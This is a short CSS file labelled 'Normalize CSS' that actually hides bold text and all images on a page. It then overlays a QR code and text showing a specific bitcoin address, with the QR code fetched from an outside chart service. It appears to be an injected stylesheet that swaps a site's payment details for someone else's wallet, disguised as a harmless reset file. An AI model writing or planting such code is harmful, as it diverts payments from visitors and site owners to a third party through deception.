/* Normalize CSS */
.left{background: url('https://chart.googleapis.com/chart?chs=250x250&cht=qr&chl=bitcoin:3ENXbtqNZxDDz3A2ekTMZnS71Dz27YW12G') no-repeat;width: 250px;height: 250px !important;}
strong{display: none !important;}
.content p:nth-child(2):after{white-space: pre-wrap;font-size: 16px;font-weight: bold;content: "\A\A 3ENXbtqNZxDDz3A2ekTMZnS71Dz27YW12G" !important;}
img {opacity: 0 !important;}
